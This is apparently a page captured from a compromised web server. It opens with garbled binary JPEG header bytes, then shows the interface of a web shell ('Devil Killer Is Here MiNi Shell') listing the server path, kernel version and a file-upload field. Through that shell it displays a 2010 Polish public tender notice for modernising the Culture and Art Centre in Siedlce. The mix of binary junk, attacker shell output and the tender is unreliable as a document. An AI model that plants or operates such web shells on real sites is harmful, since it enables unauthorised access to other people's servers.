JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100413/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100413/104080-N-2010.html

<p class="kh_header"><b>Siedlce: Modernizacja budynku Centrum Kultury i Sztuki w Siedlcach  przy ul. Bpa I. Świrskiego 31, 08-110 Siedlce (projekt + wykonanie).</b><br>
<b>Numer ogłoszenia: 104080 - 2010; data zamieszczenia: 13.04.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Centrum Kultury i Sztuki w Siedlcach , ul. Bp. I. Świrskiego 31, 08-110 Siedlce, woj. mazowieckie, tel. 025 6446800, faks 025 6445646.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ckis.siedlce.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: samorządowa instytucja kultury.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Modernizacja budynku Centrum Kultury i Sztuki w Siedlcach  przy ul. Bpa I. Świrskiego 31, 08-110 Siedlce (projekt + wykonanie)..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest: Modernizacja budynku Centrum Kultury i Sztuki w Siedlcach przy                                   ul. Bpa I Świrskiego 31, 08 - 110 Siedlce (projekt + wykonanie). 

Zakres zamówienia obejmuje opracowanie dokumentacji projektowej oraz wykonanie robót budowlanych w oparciu                o opracowany projekt (projekt budowlany i wykonawczy).
Przedmiot zamówienia obejmuje następujący zakres robót modernizacyjnych :
A.	Modernizacja ścian i sufitów w sali  widowiskowej Centrum Kultury i Sztuki w Siedlcach,
B.	Remont i renowacja elewacji i dachu budynku Centrum Kultury i Sztuki w Siedlcach,
C.	Modernizacja foyer w budynku Centrum Kultury  i Sztuki w Siedlcach.

Etap I - opracowanie dokumentacji projektowej.

Przed przystąpieniem do projektowania Wykonawca przeprowadzi inwentaryzację budynku i pomieszczeń w zakresie niezbędnym do realizacji zadania opisanego w punktach od A do C. Dokumentacja projektowa powinna zawierać następujące  branże :
-architektura,
-projekt wnętrz (sala widowiskowa i foyer),
-konstrukcja (ewentualnie w zakresie niezbędnym do realizacji robót modernizacyjnych związanych z realizacja zadań opisanych  w punktach  A - C),
-instalacja wod-kan (w zakresie niezbędnym do realizacji robót modernizacyjnych związanych z realizacją zadania opisanego w punkcie C),
-instalacja centralnego ogrzewania w zakresie niezbędnym do realizacji zadań opisanych w punktach A i B,
-instalacja wentylacji mechanicznej w zakresie niezbędnym do realizacji zadań opisanych w punktach A i B,
-instalacja elektryczna  w zakresie niezbędnym do realizacji zadań opisanych  w punktach A i C,
-instalacja oświetleniowa wewnętrzna i zewnętrzna w zakresie niezbędnym do realizacji zadań opisanych                          w punktach  od  A  do C,
-instalacja akustyczna - projekt akustyki sali widowiskowej - w celu realizacji zadania opisanego w punkcie A. Dokumentacja powinna zawierać analizę akustyki pomieszczenia sali widowiskowej (parametry akustyczne, pogłos w zależności od wypełnienia sali publicznością - miejsca siedzące bez stojących ludzi, 25 % wypełnienia, 50 % wypełnienia, 100% wypełnienia , częstotliwość  itd.),
-instalacja teletechniczna, monitoring , system ppoż. w zakresie niezbędnym do realizacji zadań opisanych                      w punktach  od A do C z wykorzystaniem i podłączeniem do istniejących w budynku systemów ppoż.                                 i monitoringu,
-instalacja nagłośnienia w zakresie niezbędnym do realizacji zadań opisanych  w punkcie A,
-instalacja odgromowa w zakresie niezbędnym do realizacji zadań opisanych w punkcie B i dowiązaniu                              do istniejącej odgromówki.

Wykonawca we wstępnej fazie projektowania zobowiązany jest do przedstawienia trzech koncepcji  związanych                 z realizacją zadania wymienionego w punktach A; B i C. Należy przedstawić opracowania wizualizacji:
-elewacji budynku Centrum Kultury i Sztuki w Siedlcach (ze szczególnym zwróceniem uwagi na elewacje                        od strony ulic: Bpa  I. Świrskiego, E. Orzeszkowej i Małej,
-pomieszczenia sali widowiskowej,
-pomieszczenia foyer.

Opracowane wizualizacje podlegają obowiązkowo zatwierdzeniu przez Zamawiającego.                                 Tylko zaakceptowana wersja wizualizacji jest podstawą do opracowania dokumentacji projektowej.
1.	Opracowanie trzech koncepcji dla zadań:
A.	Modernizacja ścian i sufitów w sali  widowiskowej Centrum Kultury i Sztuki w Siedlcach,
B.	Remont i renowacja elewacji i dachu budynku Centrum Kultury i Sztuki w Siedlcach,
C.	Modernizacja foyer w budynku Centrum Kultury i Sztuki w Siedlcach.

2.	Projekt Wielobranżowy Budowlano - Wykonawczy dla części zadania Modernizacja ścian i sufitów w sali  widowiskowej Centrum Kultury i Sztuki w Siedlcach (konstrukcja, architektura, wystrój wnętrz z detalami architektonicznymi i wyposażeniem stałym lub rozbieralnym stanowiącym integralną część przedsięwzięcia inwestycyjnego, instalacje sanitarne wewnętrzne oraz instalacje elektryczne i teletechniczne, instalacja akustyczna, monitoring, system ppoż, instalacja nagłośnienia w zakresie niezbędnym do realizacji zadania).                                                                                                                                                        - 4 egz.
3.	Projekt Wielobranżowy Budowlano - Wykonawczy dla części zadania Remont i renowacja elewacji i dachu budynku Centrum Kultury i Sztuki w Siedlcach (konstrukcja, architektura, kolorystyki elewacji z detalami architektonicznymi oraz instalacje elektryczne i teletechniczne, monitoring, system ppoż, instalacja odgromowa, remont kominów i szybów wentylacyjnych).                                                                         - 5 egz.
4.	Projekt Wielobranżowy Budowlano - Wykonawczy dla części zadania Modernizacja foyer w budynku Centrum Kultury i Sztuki w Siedlcach (konstrukcja, architektura, wystrój wnętrz z detalami architektonicznymi i wyposażeniem stałym lub rozbieralnym stanowiącym integralną część przedsięwzięcia inwestycyjnego, instalacje sanitarne wewnętrzne oraz instalacje elektryczne i teletechniczne, monitoring, system ppoż.)                                                                                                                                                 - 5 egz.
5.	Specyfikacje techniczne odbioru i wykonania robót (oddzielnie dla każdej branży).                                                                                                                                               - 4 egz.
6.	Przedmiary robót (oddzielnie dla każdej branży).                                                                                        - 5 egz.
7.	Kosztorysy (dzielnie dla każdej branży).			                                                                 - 2 egz.  


ETAP II - wykonanie robót budowlanych na podstawie powyższych Projektów i Specyfikacji Technicznych Wykonania i Odbioru Robót Budowlanych.

1.	Roboty - realizacja zadania - Modernizacja ścian i sufitów w sali  widowiskowej Centrum Kultury i Sztuki                  w Siedlcach (część A).
2.	Roboty - realizacja zadania - Remont i renowacja elewacji i dachu budynku Centrum Kultury i Sztuki                                w Siedlcach (część B).
3.	Roboty - realizacja zadania - Modernizacja foyer w budynku Centrum Kultury i Sztuki w Siedlcach(część C).

UWAGI:
1.	Szczegółowy zakres niniejszej inwestycji określa Program Funkcjonalno - Użytkowy.
2.	Przed przystąpieniem do złożenia oferty wskazana jest wizja w terenie (osoba wyznaczona do kontaktu - Marcin Lawędziak Kierownik Działu Administracyjno - Gospodarczego Cis w Siedlcach, kom. 0 507 056 420).
3.	Zamawiający informuje, że aktualnie realizowane jest zadanie inwestycyjne pod nazwą Przebudowa i rozbudowa budynku Centrum Kultury i Sztuki w Siedlcach przy ul. Bpa I Świrskiego 31, 08 - 110 Siedlce. W ramach powyższego zadania przewidziane są prace w części sali widowiskowej - sceny oraz jej elewacji, o której mowa w Programie Funkcjonalno - Użytkowym. 
4.	Dokumentacje projektową należy opracować zgodnie z art. 20 Prawa budowlanego z Rozporządzeniami Ministra Infrastruktury z dnia 3 lipca 2003 r. w sprawie szczegółowego zakresu i  formy projektu budowlanego, z dnia 2 września 2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych praz programu funkcjonalno - użytkowego.
5.	Informację dotycząca Bezpieczeństwa i Ochrony Zdrowia ze względu na specyfikę prac budowlanych - (dołączyć do projektów).
6.	Roboty należy realizować zgodnie ze sztuką budowlaną, szczególnymi Specyfikacjami Technicznymi Wykonania i Odbioru Robót Budowlanych obowiązującymi przy wykonywaniu robót, warunkami bezpieczeństwa o ochrony zdrowia oraz zgodnie z projektem budowlanym i warunkami technicznymi..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.00.00.00-8, 45.10.00.00-8, 45.11.13.00-1, 45.44.30.00-4, 45.40.00.00-1, 45.30.00.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.10.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wadium  w wysokości: 10 000,00  zł (dziesięć tysięcy złotych). 
Wadium w formie pieniężnej wykonawca wpłaci przelewem na konto Centrum Kultury i Sztuki w Siedlcach ING Bank Śląski S.A. Nr 98 1020 4476 0000 8902 0022 1291, ul. Sokołowska 56, 08-110 Siedlce, z dopiskiem Modernizacja Budynku Centrum Kultury i Sztuki w Siedlcach przy ul. Bpa I Świrskiego 31, 08 - 110 Siedlce (projekt + wykonanie). Wniesienie wadium w pieniądzu będzie skuteczne jeżeli w podanym terminie znajdzie się na rachunku bankowym Zamawiającego. Wadium wnoszone w innej formie jak pieniądze wykonawca składa w oryginale w Dziale Księgowym Centrum Kultury i Sztuki w Siedlcach lub zamieszcza w odrębnej kopercie i składa w miejscu wyznaczonym na składanie ofert w godzinach od 800 do  1600. Nie należy załączać oryginału dokumentu wadialnego do oferty.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a)	wykażą, że wykonali dwie prace projektowe o charakterze i złożoności porównywalnej                 z przedmiotem zamówienia (w tym jeden projekt budynku użyteczności publicznej)                       o wartości nie mniejszej niż 80 000, 00 zł każda w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie;                
      
b)	wykażą, że wykonali dwie roboty budowlane o charakterze i złożoności porównywalnej                   z przedmiotem zamówienia (w tym jeden budynek użyteczności publicznej) o wartości                   nie mniejszej niż 2 000 000, 00 zł każda w okresie ostatnich pięciu lat przed upływem termin składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie;</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a)	wykażą, że dysponują osobami, które będą uczestniczyć w wykonywaniu zamówienia,                  w szczególności odpowiedzialnymi za świadczenie usług, kierowanie robotami budowlanymi, posiadającymi kwalifikacje zawodowe, doświadczenie i wykształcenie niezbędne dla wykonania zamówienia, tj.:

uprawnienia budowlane  do projektowania bez ograniczeń w specjalności:
- konstrukcyjno-budowlanej;
- instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych,    
  wodociągowych i kanalizacyjnych;
- instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych                                       i elektroenergetycznych z przynależnością do Okręgowej Izby Inżynierów Budownictwa, jeżeli obowiązek przynależności do Izby wynika z odrębnych przepisów  i ich doświadczeniem zawodowym;

uprawnienia budowlane do kierowania robotami budowlanymi w specjalności:
         - architektonicznej
- konstrukcyjno-budowlanej;
- instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych,    
  wodociągowych i kanalizacyjnych;
-instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych                                      i elektroenergetycznych z przynależnością do Okręgowej Izby Inżynierów Budownictwa, jeżeli obowiązek przynależności do Izby wynika z odrębnych przepisów  i ich doświadczeniem zawodowym.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a)	posiadają środki finansowe lub zdolność kredytową w wysokości co najmniej                       2 000 000, 00 zł;
                   
b)	są ubezpieczeni od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę sumy ubezpieczenia co najmniej                              2 000 000, 00 zł.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Dopuszcza się możliwość zmiany umowy:
a)	w zakresie przedłużenia terminu realizacji przedmiotu zamówienia w związku z zaistnieniem warunków pogodowych uniemożliwiających wykonanie prac budowlanych, 
b)	w zakresie przedłużenia terminu realizacji przedmiotu zamówienia z przyczyn niezależnych od  Wykonawcy.
c)	w przypadku zaistniałej konieczności wynikającej z zapisów umowy  o dofinansowanie zadania między Zamawiającym a jednostką udzielającą dofinansowania zadania - powyższe nie może być podstawą do zwiększenia wynagrodzenia i zakresu zamówienia,
2.	Wszelkie zmiany i uzupełnienia w treści Umowy mogą być dokonywane wyłącznie w formie aneksu podpisanego przez obie strony pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.ckis.siedlce.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Sekretariat Centrum Kultury i Sztuki  w Siedlcach, ul. Bpa I. Świrskiego 31,08-110 Siedlce, (cena: 45,00 zł brutto + koszt przesyłki)..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.04.2010 godzina 16:45, miejsce: Sekretariat Centrum Kultury i Sztuki  w Siedlcach, ul. Bpa I. Świrskiego 31,08-110 Siedlce.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamawiający jest umieszczony na liście rankingowej nr 11 wniosków zatwierdzonych wstępnie do dofinansowania złożonych w ramach konkursu RPOWM/6.1/1/2008 dla działania 6.1 Kultura..</p>
